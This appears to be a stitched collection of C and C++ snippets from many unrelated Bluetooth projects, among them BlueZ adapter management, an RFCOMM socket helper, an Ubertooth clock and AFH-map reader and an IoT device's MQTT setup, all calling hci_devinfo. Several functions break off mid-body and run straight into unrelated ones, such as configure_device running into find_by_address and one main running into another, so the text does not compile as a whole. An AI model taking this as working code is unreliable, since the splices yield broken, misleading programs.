static struct device_opts *get_device_opts(int hdev)
{
struct device_opts *device_opts = NULL;
struct hci_dev_info di;
/* First try to get BD_ADDR based settings ... */
if (hci_devinfo(hdev, &di) == 0) {
char addr[18];
ba2str(&di.bdaddr, addr);
device_opts = find_device_opts(addr);
}
/* ... then try HCI based settings ... */
if (!device_opts) {
char ref[8];
snprintf(ref, sizeof(ref) - 1, "hci%d", hdev);
device_opts = find_device_opts(ref);
}
/* ... and last use the default settings. */
if (!device_opts)
device_opts = &default_device;
return device_opts;
}
static int parse_dev_src(const char * arg, gchar **addr, int *index)
{
char *end;
struct hci_dev_info di = { 0 };
if (strncmp(arg, "hci", 3))
return -1;
*index = strtol(arg + 3, &end, 10);
if (*end != '\0')
return -1;
if (hci_devinfo(*index, &di))
return -1;
DBG("devinfo: %02x:%02x:%02x:%02x:%02x:%02x hci%d '%s' f:0x%08x t:%s",
di.bdaddr.b[5], di.bdaddr.b[4], di.bdaddr.b[3], di.bdaddr.b[2], di.bdaddr.b[1], di.bdaddr.b[0],
di.dev_id, di.name, di.flags, di.type == BDADDR_LE_PUBLIC?"public":"random");
*addr = g_malloc(18);
if (*addr == NULL)
return -2;
if (ba2str(&di.bdaddr, *addr) != 17)
return -2;
return 0;
}
bool CBlueZStack::IsEnabled()
{
struct hci_dev_info di;
if (hci_devinfo(g_devId, &di) < 0) {
return false;
}
return hci_test_bit(HCI_UP, &(di.flags));
}
LEDevice *LEDevice::newPeripheral(Beetle &beetle, HCI &hci, bdaddr_t bdaddr,
AddrType addrType) {
struct sockaddr_l2 loc_addr;
memset(&loc_addr, 0, sizeof(struct sockaddr_l2));
loc_addr.l2_family = AF_BLUETOOTH;
hci_dev_info devInfo;
hci_devinfo(hci.getDeviceId(), &devInfo);
bacpy(&loc_addr.l2_bdaddr, &devInfo.bdaddr);
loc_addr.l2_psm = 0;
loc_addr.l2_cid = htobs(ATT_CID);
loc_addr.l2_bdaddr_type = devInfo.type;
struct sockaddr_l2 rem_addr;
memset(&rem_addr, 0, sizeof(struct sockaddr_l2));
rem_addr.l2_family = AF_BLUETOOTH;
bacpy(&rem_addr.l2_bdaddr, &bdaddr);
rem_addr.l2_psm = 0;
rem_addr.l2_cid = htobs(ATT_CID);
rem_addr.l2_bdaddr_type = (addrType == PUBLIC) ? BDADDR_LE_PUBLIC : BDADDR_LE_RANDOM;
int sockfd = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
if (sockfd < 0) {
throw DeviceException("could not create socket");
}
if (bind(sockfd, (struct sockaddr *) &loc_addr, sizeof(loc_addr)) < 0) {
close(sockfd);
throw DeviceException("could not bind");
}
if (connect(sockfd, (struct sockaddr *) &rem_addr, sizeof(rem_addr)) < 0) {
close(sockfd);
throw DeviceException("could not connect");
}
struct l2cap_conninfo connInfo;
unsigned int connInfoLen = sizeof(connInfo);
if (getsockopt(sockfd, SOL_L2CAP, L2CAP_CONNINFO, &connInfo, &connInfoLen) < 0) {
close(sockfd);
throw DeviceException("could not get l2cap conn info");
}
if (debug_socket) {
std::stringstream ss;
ss << "peripheral hci handle: " << connInfo.hci_handle;
pdebug(ss.str());
}
std::string name;
std::list<delayed_packet_t> delayedPackets;
if (!request_device_name(sockfd, name, delayedPackets)) {
close(sockfd);
throw DeviceException("could not discover device name");
}
return new LEDevice(beetle, hci, sockfd, rem_addr, connInfo, LE_PERIPHERAL,
name, delayedPackets);
}
int bt_sock_open(int devid, bdaddr_t const *btaddr, int channel, int timeout)
{
int sock;
struct sockaddr_rc laddr, raddr;
struct hci_dev_info di;
fd_set wfds;
struct timeval tv;
char straddr[64], rstraddr[64];
if (hci_devinfo(devid, &di) < 0) {
perror("hci_devinfo");
return -1;
}
laddr.rc_family = AF_BLUETOOTH;
laddr.rc_bdaddr = di.bdaddr;
laddr.rc_channel = 0;
raddr.rc_family = AF_BLUETOOTH;
raddr.rc_bdaddr = *btaddr;
raddr.rc_channel = channel;
if ((sock = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM)) < 0) {
perror("socket");
return -1;
}
if (bind(sock, (struct sockaddr *) &laddr, sizeof(laddr)) < 0) {
perror("bind");
close(sock);
return -1;
}
printf("Local device %s\n", bt_sock_addr2str(&di.bdaddr, straddr));
printf("Remote device %s (%d)\n", bt_sock_addr2str(btaddr, rstraddr), channel);
bt_sockndelay(sock, 1);
if (connect(sock, (struct sockaddr *) &raddr, sizeof(raddr)) < 0) {
if (errno != EINPROGRESS && errno != EWOULDBLOCK) {
perror("connect");
close(sock);
return -1;
}
FD_ZERO(&wfds);
FD_SET(sock, &wfds);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if (select(sock + 1, (fd_set *) 0, &wfds, (fd_set *) 0, &tv) == -1) {
perror("select");
close(sock);
return -1;
}
if (!FD_ISSET(sock, &wfds)) {
printf("connect timeout\n");
close(sock);
return -1;
}
}
bt_sockndelay(sock, 0);
return sock;
}
int main(int argc, char *argv[]) {
char *address = "14:1a:a3:9b:41:8e";
int dev_id = hci_devid(address);
struct hci_dev_info *di = (struct hci_dev_info *)malloc(sizeof(struct hci_dev_info));
int rtn = hci_devinfo(dev_id, di);
printf("%s\n", di->name);
return 0;
}
void update_service_classes(const bdaddr_t *bdaddr, uint8_t value)
{
struct hci_dev_list_req *dl;
struct hci_dev_req *dr;
int i, sk;
sk = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
if (sk < 0)
return;
dl = g_malloc0(HCI_MAX_DEV * sizeof(*dr) + sizeof(*dl));
dl->dev_num = HCI_MAX_DEV;
dr = dl->dev_req;
if (ioctl(sk, HCIGETDEVLIST, dl) < 0) {
close(sk);
g_free(dl);
return;
}
dr = dl->dev_req;
for (i = 0; i < dl->dev_num; i++, dr++) {
struct hci_dev_info di;
uint8_t cls[3];
int dd;
if (hci_devinfo(dr->dev_id, &di) < 0)
continue;
if (hci_test_bit(HCI_RAW, &di.flags))
continue;
if (get_device_class(di.dev_id, cls) < 0)
continue;
dd = hci_open_dev(di.dev_id);
if (dd < 0)
continue;
set_service_classes(dd, cls, value);
hci_close_dev(dd);
update_adapter(di.dev_id);
}
g_free(dl);
close(sk);
}
static void device_devreg_setup(int index)
{
struct hci_dev_info di;
gboolean devup;
init_device(index);
memset(&di, 0, sizeof(di));
if (hci_devinfo(index, &di) < 0)
return;
devup = hci_test_bit(HCI_UP, &di.flags);
if (!hci_test_bit(HCI_RAW, &di.flags))
manager_register_adapter(index, devup);
}
static DBusMessage *find_adapter(DBusConnection *conn,
DBusMessage *msg, void *data)
{
DBusMessage *reply;
struct adapter *adapter;
char *path;
struct hci_dev_info di;
const char *pattern;
int dev_id;
if (!dbus_message_get_args(msg, NULL, DBUS_TYPE_STRING, &pattern,
DBUS_TYPE_INVALID))
return NULL;
/* hci_devid() would make sense to use here, except it
is restricted to devices which are up */
if (!strncmp(pattern, "hci", 3) && strlen(pattern) >= 4)
dev_id = atoi(pattern + 3);
else
dev_id = find_by_address(pattern);
if (dev_id < 0)
return no_such_adapter(msg);
if (hci_devinfo(dev_id, &di) < 0)
return no_such_adapter(msg);
if (hci_test_bit(HCI_RAW, &di.flags))
return no_such_adapter(msg);
adapter = manager_find_adapter_by_id(dev_id);
if (!adapter)
return no_such_adapter(msg);
reply = dbus_message_new_method_return(msg);
if (!reply)
return NULL;
path = adapter->path + ADAPTER_PATH_INDEX;
dbus_message_append_args(reply, DBUS_TYPE_OBJECT_PATH, &path,
DBUS_TYPE_INVALID);
return reply;
}
static void cmd_info(int argcp, char **argvp)
{
struct hci_dev_info di = { 0 };
char s[18];
hci_devinfo(opt_src_idx, &di);
if (ba2str(&di.bdaddr, s) != 17)
memset(s, 0xFF, sizeof(s) - 1);
resp_begin(rsp_MGMT);
send_sym(tag_ERRCODE, err_SUCCESS);
/* Always returns the programmed public bdaddr of the device */
send_str(tag_ADDR, s);
send_str(tag_TYPE, "public");
resp_end();
}
static int open_socket(bdaddr_t *bdaddr, uint8_t channel, int dev_id)
{
struct sockaddr_rc remote_addr, local_addr;
struct hci_dev_info di;
int s;
if ((s = socket(PF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM)) < 0) {
printf("Can't create socket. %s (%d)\n", strerror(errno), errno);
return -1;
}
memset(&local_addr, 0, sizeof(local_addr));
// Get the bluetooth address of the first local
// bluetooth device
if(hci_devinfo(dev_id, &di) < 0)
{
perror("HCI device info failed");
exit(1);
}
local_addr.rc_family = AF_BLUETOOTH;
local_addr.rc_bdaddr = di.bdaddr;
bacpy(&local_addr.rc_bdaddr, BDADDR_ANY);
if (bind(s, (struct sockaddr *)&local_addr, sizeof(local_addr)) < 0) {
printf("Can't bind socket. %s (%d)\n", strerror(errno), errno);
close(s);
return -1;
}
memset(&remote_addr, 0, sizeof(remote_addr));
remote_addr.rc_family = AF_BLUETOOTH;
bacpy(&remote_addr.rc_bdaddr, bdaddr);
remote_addr.rc_channel = channel;
if (connect(s, (struct sockaddr *)&remote_addr, sizeof(remote_addr)) < 0) {
printf("Can't connect. %s (%d)\n", strerror(errno), errno);
close(s);
return -1;
}
return s;
}
int csr_open_hci(char *device)
{
struct hci_dev_info di;
struct hci_version ver;
int dev = 0;
if (device) {
dev = hci_devid(device);
if (dev < 0) {
fprintf(stderr, "Device not available\n");
return -1;
}
}
dd = hci_open_dev(dev);
if (dd < 0) {
fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
dev, strerror(errno), errno);
return -1;
}
if (hci_devinfo(dev, &di) < 0) {
fprintf(stderr, "Can't get device info for hci%d: %s (%d)\n",
dev, strerror(errno), errno);
hci_close_dev(dd);
return -1;
}
if (hci_read_local_version(dd, &ver, 1000) < 0) {
fprintf(stderr, "Can't read version info for hci%d: %s (%d)\n",
dev, strerror(errno), errno);
hci_close_dev(dd);
return -1;
}
if (ver.manufacturer != 10) {
fprintf(stderr, "Unsupported manufacturer\n");
hci_close_dev(dd);
return -1;
}
return 0;
}
static void configure_device(int index)
{
struct hci_dev_info di;
uint16_t policy;
int dd;
if (hci_devinfo(index, &di) < 0)
return;
if (hci_test_bit(HCI_RAW, &di.flags))
return;
dd = hci_open_dev(index);
if (dd < 0) {
error("Can't open device hci%d: %s (%d)",
index, strerror(errno), errno);
return;
}
/* Set device name */
if ((main_opts.flags & (1 << HCID_SET_NAME)) && main_opts.name) {
change_local_name_cp cp;
memset(cp.name, 0, sizeof(cp.name));
expand_name((char *) cp.name, sizeof(cp.name),
main_opts.name, index);
hci_send_cmd(dd, OGF_HOST_CTL, OCF_CHANGE_LOCAL_NAME,
CHANGE_LOCAL_NAME_CP_SIZE, &cp);
}
/* Set device class */
if ((main_opts.flags & (1 << HCID_SET_CLASS))) {
write_class_of_dev_cp cp;
uint32_t class;
uint8_t cls[3];
if (read_local_class(&di.bdaddr, cls) < 0) {
class = htobl(main_opts.class);
cls[2] = get_service_classes(&di.bdaddr);
memcpy(cp.dev_class, &class, 3);
} else {
if (!(main_opts.scan & SCAN_INQUIRY))
static int find_by_address(const char *str)
{
struct hci_dev_list_req *dl;
struct hci_dev_req *dr;
bdaddr_t ba;
int i, sk;
int devid = -1;
sk = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
if (sk < 0)
return -1;
dl = g_malloc0(HCI_MAX_DEV * sizeof(*dr) + sizeof(*dl));
dl->dev_num = HCI_MAX_DEV;
dr = dl->dev_req;
if (ioctl(sk, HCIGETDEVLIST, dl) < 0)
goto out;
dr = dl->dev_req;
str2ba(str, &ba);
for (i = 0; i < dl->dev_num; i++, dr++) {
struct hci_dev_info di;
if (hci_devinfo(dr->dev_id, &di) < 0)
continue;
if (hci_test_bit(HCI_RAW, &di.flags))
continue;
if (!bacmp(&ba, &di.bdaddr)) {
devid = dr->dev_id;
break;
}
}
out:
g_free(dl);
close(sk);
return devid;
}
static void device_devup_setup(int index)
{
struct hci_dev_info di;
uint16_t policy;
int dd, err;
if (hci_devinfo(index, &di) < 0)
return;
if (hci_test_bit(HCI_RAW, &di.flags))
return;
dd = hci_open_dev(index);
if (dd < 0) {
err = errno;
error("Can't open device hci%d: %s (%d)",
index, strerror(err), err);
return;
}
/* Set page timeout */
if ((main_opts.flags & (1 << HCID_SET_PAGETO))) {
write_page_timeout_cp cp;
cp.timeout = htobs(main_opts.pageto);
hci_send_cmd(dd, OGF_HOST_CTL, OCF_WRITE_PAGE_TIMEOUT,
WRITE_PAGE_TIMEOUT_CP_SIZE, &cp);
}
/* Set default link policy */
policy = htobs(main_opts.link_policy);
hci_send_cmd(dd, OGF_LINK_POLICY,
OCF_WRITE_DEFAULT_LINK_POLICY, 2, &policy);
hci_close_dev(dd);
start_security_manager(index);
/* Return value 1 means ioctl(DEVDOWN) was performed */
if (manager_start_adapter(index) == 1)
stop_security_manager(index);
}
CBlueZStack::CBlueZStack():
CGenericBluetoothStack(), m_fd(-1)
{
if (g_devId < 0) {
// retrieve local bluetooth address from environment variable
const char *addr = getenv("JSR82BTADDR");
if (addr != NULL) {
g_devId = hci_devid(addr);
} else {
g_devId = hci_get_route(NULL);
}
if (g_devId < 0) {
return;
}
hci_dev_info di;
hci_devinfo(g_devId, &di);
}
m_fd = hci_open_dev(g_devId);
if (m_fd < 0) {
return;
}
fcntl(m_fd, F_SETFL, O_NONBLOCK);
hci_filter flt;
hci_filter_clear(&flt);
hci_filter_set_ptype(HCI_EVENT_PKT, &flt);
hci_filter_set_event(EVT_CMD_COMPLETE, &flt);
hci_filter_set_event(EVT_CMD_STATUS, &flt);
hci_filter_set_event(EVT_INQUIRY_COMPLETE, &flt);
hci_filter_set_event(EVT_INQUIRY_RESULT, &flt);
hci_filter_set_event(EVT_INQUIRY_RESULT, &flt);
hci_filter_set_event(EVT_REMOTE_NAME_REQ_COMPLETE, &flt);
hci_filter_set_event(EVT_AUTH_COMPLETE, &flt);
hci_filter_set_event(EVT_ENCRYPT_CHANGE, &flt);
if (setsockopt(m_fd, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) {
return;
}
m_poll.fd = m_fd;
m_poll.events = POLLIN | POLLHUP | POLLERR;
m_poll.revents = 0;
m_bInitialized = true;
}
static DBusMessage *old_find_adapter(DBusConnection *conn,
DBusMessage *msg, void *data)
{
DBusMessage *reply;
char path[MAX_PATH_LENGTH], *path_ptr = path;
struct hci_dev_info di;
const char *pattern;
int dev_id;
if (!dbus_message_get_args(msg, NULL,
DBUS_TYPE_STRING, &pattern,
DBUS_TYPE_INVALID))
return invalid_args(msg);
/* hci_devid() would make sense to use here, except it
is restricted to devices which are up */
if (!strncmp(pattern, "hci", 3) && strlen(pattern) >= 4)
dev_id = atoi(pattern + 3);
else
dev_id = find_by_address(pattern);
if (dev_id < 0)
return no_such_adapter(msg);
if (hci_devinfo(dev_id, &di) < 0)
return no_such_adapter(msg);
if (hci_test_bit(HCI_RAW, &di.flags))
return no_such_adapter(msg);
reply = dbus_message_new_method_return(msg);
if (!reply)
return NULL;
snprintf(path, sizeof(path), "%s/hci%d", BASE_PATH, dev_id);
dbus_message_append_args(reply, DBUS_TYPE_STRING, &path_ptr,
DBUS_TYPE_INVALID);
return reply;
}
int get_rssi(bdaddr_t *bdaddr, struct hci_state current_hci_state)
{
struct hci_dev_info di;
if (hci_devinfo(current_hci_state.device_id, &di) < 0) {
perror("Can't get device info");
return(-1);
}
uint16_t handle;
// int hci_create_connection(int dd, const bdaddr_t *bdaddr, uint16_t ptype, uint16_t clkoffset, uint8_t rswitch, uint16_t *handle, int to);
// HCI_DM1 | HCI_DM3 | HCI_DM5 | HCI_DH1 | HCI_DH3 | HCI_DH5
if (hci_create_connection(current_hci_state.device_handle, bdaddr, htobs(di.pkt_type & ACL_PTYPE_MASK), 0, 0x01, &handle, 25000) < 0) {
perror("Can't create connection");
// TODO close(dd);
return(-1);
}
sleep(1);
struct hci_conn_info_req *cr = malloc(sizeof(*cr) + sizeof(struct hci_conn_info));
bacpy(&cr->bdaddr, bdaddr);
cr->type = ACL_LINK;
if(ioctl(current_hci_state.device_handle, HCIGETCONNINFO, (unsigned long) cr) < 0) {
perror("Get connection info failed");
return(-1);
}
int8_t rssi;
if(hci_read_rssi(current_hci_state.device_handle, htobs(cr->conn_info->handle), &rssi, 1000) < 0) {
perror("Read RSSI failed");
return(-1);
}
printf("RSSI return value: %d\n", rssi);
free(cr);
usleep(10000);
hci_disconnect(current_hci_state.device_handle, handle, HCI_OE_USER_ENDED_CONNECTION, 10000);
}
int get_discoverable_timeout(int hdev)
{
struct device_opts *device_opts = NULL;
struct hci_dev_info di;
char addr[18];
int sock, timeout;
if (hdev < 0)
return HCID_DEFAULT_DISCOVERABLE_TIMEOUT;
sock = hci_open_dev(hdev);
if (sock < 0)
goto no_address;
if (hci_devinfo(hdev, &di) < 0) {
close(sock);
goto no_address;
}
close(sock);
if (read_discoverable_timeout(&di.bdaddr, &timeout) == 0)
return timeout;
ba2str(&di.bdaddr, addr);
device_opts = find_device_opts(addr);
no_address:
if (!device_opts) {
char ref[8];
snprintf(ref, sizeof(ref) - 1, "hci%d", hdev);
device_opts = find_device_opts(ref);
}
if (!device_opts)
device_opts = &default_device;
return device_opts->discovto;
}
static DBusMessage *list_adapters(DBusConnection *conn,
DBusMessage *msg, void *data)
{
DBusMessageIter iter;
DBusMessageIter array_iter;
DBusMessage *reply;
GSList *l;
reply = dbus_message_new_method_return(msg);
if (!reply)
return NULL;
dbus_message_iter_init_append(reply, &iter);
dbus_message_iter_open_container(&iter, DBUS_TYPE_ARRAY,
DBUS_TYPE_OBJECT_PATH_AS_STRING, &array_iter);
for (l = adapters; l; l = l->next) {
struct adapter *adapter = l->data;
char *path;
struct hci_dev_info di;
if (hci_devinfo(adapter->dev_id, &di) < 0)
continue;
if (hci_test_bit(HCI_RAW, &di.flags))
continue;
path = adapter->path + ADAPTER_PATH_INDEX;
dbus_message_iter_append_basic(&array_iter,
DBUS_TYPE_OBJECT_PATH, &path);
}
dbus_message_iter_close_container(&iter, &array_iter);
return reply;
}
static char *
get_host_bdaddr (void)
{
FILE *f;
int mac[6];
struct hci_dev_info di;
int dd;
dd = hci_open_dev(0);
if (dd < 0) {
g_warning("Can't open device hci%d: %s (%d)\n",
0, strerror(errno), errno);
return NULL;
}
if (hci_devinfo(0, &di) < 0) {
g_warning("Can't get device info for hci%d: %s (%d)\n",
0, strerror(errno), errno);
return NULL;
}
hci_close_dev(dd);
sscanf(batostr(&di.bdaddr), "%X:%X:%X:%X:%X:%X",&mac[5],&mac[4],&mac[3],&mac[2],&mac[1],&mac[0]);
return g_strdup_printf ("%02X:%02X:%02X:%02X:%02X:%02X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
}
hci_controller_t hci_open_controller(bt_address_t *mac, char *name) {
hci_controller_t res = {0};
res.state = HCI_STATE_CLOSED;
struct hci_dev_info info;
hci_socket_t hci_socket = open_hci_socket(mac);
char real_name[8] = "UNKNOWN";
if (hci_socket.sock < 0) {
return res;
}
list_push(&(res.sockets_list), &hci_socket, sizeof(hci_socket_t));
if (hci_devinfo(hci_socket.dev_id, &info) >= 0) {
strncpy(real_name, info.name, 8);
if (!mac) {
*mac = info.bdaddr;
}
}
res.device = bt_device_create(*mac, PUBLIC_DEVICE_ADDRESS, real_name, name);
res.state = HCI_STATE_OPEN;
res.interrupted = 0;
return res;
}
static struct device_opts *get_opts(int hdev)
{
struct device_opts *device_opts = NULL;
struct hci_dev_info di;
char addr[18];
int sock;
if (hdev < 0)
return NULL;
sock = hci_open_dev(hdev);
if (sock < 0)
goto no_address;
if (hci_devinfo(hdev, &di) < 0) {
close(sock);
goto no_address;
}
close(sock);
ba2str(&di.bdaddr, addr);
device_opts = find_device_opts(addr);
no_address:
if (!device_opts) {
char ref[8];
snprintf(ref, sizeof(ref) - 1, "hci%d", hdev);
device_opts = find_device_opts(ref);
}
if (!device_opts)
device_opts = &default_device;
return device_opts;
}
static void configure_device(int index)
{
struct hci_dev_info di;
uint16_t policy;
int dd, err;
if (hci_devinfo(index, &di) < 0)
return;
if (hci_test_bit(HCI_RAW, &di.flags))
return;
dd = hci_open_dev(index);
if (dd < 0) {
err = errno;
error("Can't open device hci%d: %s (%d)",
index, strerror(err), err);
return;
}
/* Set page timeout */
if ((main_opts.flags & (1 << HCID_SET_PAGETO))) {
write_page_timeout_cp cp;
cp.timeout = htobs(main_opts.pageto);
hci_send_cmd(dd, OGF_HOST_CTL, OCF_WRITE_PAGE_TIMEOUT,
WRITE_PAGE_TIMEOUT_CP_SIZE, &cp);
}
/* Set default link policy */
policy = htobs(main_opts.link_policy);
hci_send_cmd(dd, OGF_LINK_POLICY,
OCF_WRITE_DEFAULT_LINK_POLICY, 2, &policy);
hci_close_dev(dd);
}
static DBusMessage *old_list_adapters(DBusConnection *conn,
DBusMessage *msg, void *data)
{
DBusMessageIter iter;
DBusMessageIter array_iter;
DBusMessage *reply;
struct hci_dev_list_req *dl;
struct hci_dev_req *dr;
int i, sk;
if (!dbus_message_has_signature(msg, DBUS_TYPE_INVALID_AS_STRING))
return invalid_args(msg);
sk = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
if (sk < 0)
return failed_strerror(msg, errno);
dl = g_malloc0(HCI_MAX_DEV * sizeof(*dr) + sizeof(*dl));
dl->dev_num = HCI_MAX_DEV;
dr = dl->dev_req;
if (ioctl(sk, HCIGETDEVLIST, dl) < 0) {
int err = errno;
close(sk);
g_free(dl);
return failed_strerror(msg, err);
}
dr = dl->dev_req;
reply = dbus_message_new_method_return(msg);
if (!reply) {
close(sk);
g_free(dl);
return NULL;
}
dbus_message_iter_init_append(reply, &iter);
dbus_message_iter_open_container(&iter, DBUS_TYPE_ARRAY,
DBUS_TYPE_STRING_AS_STRING, &array_iter);
for (i = 0; i < dl->dev_num; i++, dr++) {
char path[MAX_PATH_LENGTH], *path_ptr = path;
struct hci_dev_info di;
if (hci_devinfo(dr->dev_id, &di) < 0)
continue;
if (hci_test_bit(HCI_RAW, &di.flags))
continue;
snprintf(path, sizeof(path), "%s/%s", BASE_PATH, di.name);
dbus_message_iter_append_basic(&array_iter,
DBUS_TYPE_STRING, &path_ptr);
}
dbus_message_iter_close_container(&iter, &array_iter);
g_free(dl);
close(sk);
return reply;
}
int main(int argc, char *argv[])
{
int opt, sock, dev_id, lap = 0, uap = 0, delay = 5;
int have_lap = 0;
int have_uap = 0;
int afh_enabled = 0;
uint8_t mode, afh_map[10];
char *end, ubertooth_device = -1;
char *bt_dev = "hci0";
char addr[19] = { 0 };
struct libusb_device_handle *devh = NULL;
uint32_t clock;
uint16_t accuracy, handle, offset;
bdaddr_t bdaddr;
btbb_piconet *pn;
struct hci_dev_info di;
int cc = 0;
pn = btbb_piconet_new();
while ((opt=getopt(argc,argv,"hl:u:U:e:d:ab:w:")) != EOF) {
switch(opt) {
case 'l':
lap = strtol(optarg, &end, 16);
if (end != optarg) {
++have_lap;
}
break;
case 'u':
uap = strtol(optarg, &end, 16);
if (end != optarg) {
++have_uap;
}
break;
case 'U':
ubertooth_device = atoi(optarg);
break;
case 'e':
max_ac_errors = atoi(optarg);
break;
case 'd':
dumpfile = fopen(optarg, "w");
if (dumpfile == NULL) {
perror(optarg);
return 1;
}
break;
case 'a':
afh_enabled = 1;
break;
case 'b':
bt_dev = optarg;
if (bt_dev == NULL) {
perror(optarg);
return 1;
}
break;
case 'w': //wait
delay = atoi(optarg);
break;
case 'h':
default:
usage();
return 1;
}
}
dev_id = hci_devid(bt_dev);
sock = hci_open_dev(dev_id);
hci_read_clock(sock, 0, 0, &clock, &accuracy, 0);
if ((have_lap != 1) || (have_uap != 1)) {
printf("No address given, reading address from device\n");
hci_read_bd_addr(sock, &bdaddr, 0);
lap = bdaddr.b[0] | bdaddr.b[1] << 8 | bdaddr.b[2] << 16;
btbb_init_piconet(pn, lap);
uap = bdaddr.b[3];
btbb_piconet_set_uap(pn, uap);
printf("LAP=%06x UAP=%02x\n", lap, uap);
} else if (have_lap && have_uap) {
btbb_init_piconet(pn, lap);
btbb_piconet_set_uap(pn, uap);
printf("Address given, assuming address is remote\n");
sprintf(addr, "00:00:%02X:%02X:%02X:%02X",
uap,
(lap >> 16) & 0xFF,
(lap >> 8) & 0xFF,
lap & 0xFF
);
str2ba(addr, &bdaddr);
printf("Address: %s\n", addr);
if (hci_devinfo(dev_id, &di) < 0) {
perror("Can't get device info");
return 1;
}
if (hci_create_connection(sock, &bdaddr,
htobs(di.pkt_type & ACL_PTYPE_MASK),
0, 0x01, &handle, 25000) < 0) {
perror("Can't create connection");
return 1;
}
sleep(1);
cc = 1;
if (hci_read_clock_offset(sock, handle, &offset, 1000) < 0) {
perror("Reading clock offset failed");
}
clock += offset;
//Experimental AFH map reading from remote device
if(afh_enabled) {
if(hci_read_afh_map(sock, handle, &mode, afh_map, 1000) < 0) {
perror("HCI read AFH map request failed");
//exit(1);
}
if(mode == 0x01) {
btbb_piconet_set_afh_map(pn, afh_map);
btbb_print_afh_map(pn);
} else {
printf("AFH disabled.\n");
afh_enabled = 0;
}
}
if (cc) {
usleep(10000);
hci_disconnect(sock, handle, HCI_OE_USER_ENDED_CONNECTION, 10000);
}
} else {
int main(void) {
int i, j, err, sock, dev_id = -1;
struct hci_dev_info dev_info;
inquiry_info *info = NULL;
bdaddr_t target;
char addr[19] = { 0 };
char name[248] = { 0 };
uuid_t uuid = { 0 };
//Change this to your apps UUID
char *uuid_str="4e5d48e0-75df-11e3-981f-0800200c9a66";
uint32_t range = 0x0000ffff;
sdp_list_t *response_list = NULL, *search_list, *attrid_list;
int s, loco_channel = -1, status;
struct sockaddr_rc loc_addr = { 0 };
pthread_t blueThread;
FILE *fp_Setting;
char message_Buffer[64];
char mode[30], language[16], topic[16], topicLen[16];
size_t len = 16;
(void) signal(SIGINT, SIG_DFL);
changeTopic_flag = 1;
///////////////////////////MRAA/////////////////////////////
//Initialize MRAA
mraa_init();
//Initialize MRAA Pin 8 == IO8 == GP49
mraa_gpio_context BearButton = mraa_gpio_init(8);
//Check for successful initialization or else return
if (BearButton == NULL){
printf("Error initializing Push to Talk Pin, IO2\n");
return -1;
}
//Set pin to an input
mraa_gpio_dir(BearButton, MRAA_GPIO_IN);
printf("Set Pin to an input\n");
int curr_pin = mraa_gpio_get_pin(BearButton);
printf("The current pin number is %d\n", curr_pin);
int curr_raw = mraa_gpio_get_pin_raw(BearButton);
printf("The raw pin number is %d\n", curr_raw);
printf("Going to start reading the button via polling\n");
//////////////////////AWS///////////////////////////////////
aws_flag = 0;
IoT_Error_t rc = NONE_ERROR;
char HostAddress[255] = AWS_IOT_MQTT_HOST;
char certDirectory[PATH_MAX + 1] = "/AWS/SDK/certs/";
uint32_t port = AWS_IOT_MQTT_PORT;
MQTTMessageParams Msg = MQTTMessageParamsDefault;
Msg.qos = QOS_0;
char cPayload[100];
Msg.pPayload = (void *) cPayload;
char rootCA[PATH_MAX + 1];
char clientCRT[PATH_MAX + 1];
char clientKey[PATH_MAX + 1];
char cafileName[] = AWS_IOT_ROOT_CA_FILENAME;
char clientCRTName[] = AWS_IOT_CERTIFICATE_FILENAME;
char clientKeyName[] = AWS_IOT_PRIVATE_KEY_FILENAME;
sprintf(rootCA, "/%s/%s", certDirectory, cafileName);
sprintf(clientCRT, "/%s/%s", certDirectory, clientCRTName);
sprintf(clientKey, "/%s/%s", certDirectory, clientKeyName);
MQTTConnectParams connectParams = MQTTConnectParamsDefault;
connectParams.KeepAliveInterval_sec = 14000;
connectParams.isCleansession = true;
connectParams.MQTTVersion = MQTT_3_1_1;
connectParams.pClientID = "TED";
connectParams.pHostURL = HostAddress;
connectParams.port = port;
connectParams.isWillMsgPresent = false;
connectParams.pRootCALocation = rootCA;
connectParams.pDeviceCertLocation = clientCRT;
connectParams.pDevicePrivateKeyLocation = clientKey;
connectParams.mqttCommandTimeout_ms = 2000;
connectParams.tlsHandshakeTimeout_ms = 5000;
connectParams.isSSLHostnameVerify = true;// ensure this is set to true for production
connectParams.disconnectHandler = disconnectCallbackHandler;
MQTTPublishParams CurriculumParams = MQTTPublishParamsDefault;
CurriculumParams.pTopic = "Bear/Curriculum/Request";
MQTTPublishParams MetricsParams = MQTTPublishParamsDefault;
MetricsParams.pTopic = "Bear/Curriculum/Metrics";
///////////////////////////////////////////////////////////////////////////////////////
dev_id = hci_get_route(NULL);
if (dev_id < 0) {
perror("No Bluetooth Adapter Available");
exit(1);
}
if (hci_devinfo(dev_id, &dev_info) < 0) {
perror("Can't get device info");
exit(1);
}
sock = hci_open_dev( dev_id );
if (sock < 0) {
perror("HCI device open failed");
free(info);
exit(1);
}
if( !str2uuid( uuid_str, &uuid ) ) {
perror("Invalid UUID");
free(info);
exit(1);
}
do {
printf("Scanning ...\n");
sdp_session_t *session;
int retries;
int foundit, responses;
str2ba(TABLET_ADDRESS,&target);
memset(name, 0, sizeof(name));
if (hci_read_remote_name(sock, &target, sizeof(name), name, 0) < 0){
strcpy(name, "[unknown]");
}
printf("Found %s %s, searching for the the desired service on it now\n", addr, name);
// connect to the SDP server running on the remote machine
sdpconnect:
session = 0; retries = 0;
while(!session) {
session = sdp_connect( BDADDR_ANY, &target, SDP_RETRY_IF_BUSY );
if(session) break;
if(errno == EALREADY && retries < 5) {
perror("Retrying");
retries++;
sleep(1);
continue;
}
break;
}
if ( session == NULL ) {
perror("Can't open session with the device");
continue;
}
search_list = sdp_list_append( 0, &uuid );
attrid_list = sdp_list_append( 0, &range );
err = 0;
err = sdp_service_search_attr_req( session, search_list, SDP_ATTR_REQ_RANGE, attrid_list, &response_list);
sdp_list_t *r = response_list;
sdp_record_t *rec;
// go through each of the service records
foundit = 0;
responses = 0;
for (; r; r = r->next ) {
responses++;
rec = (sdp_record_t*) r->data;
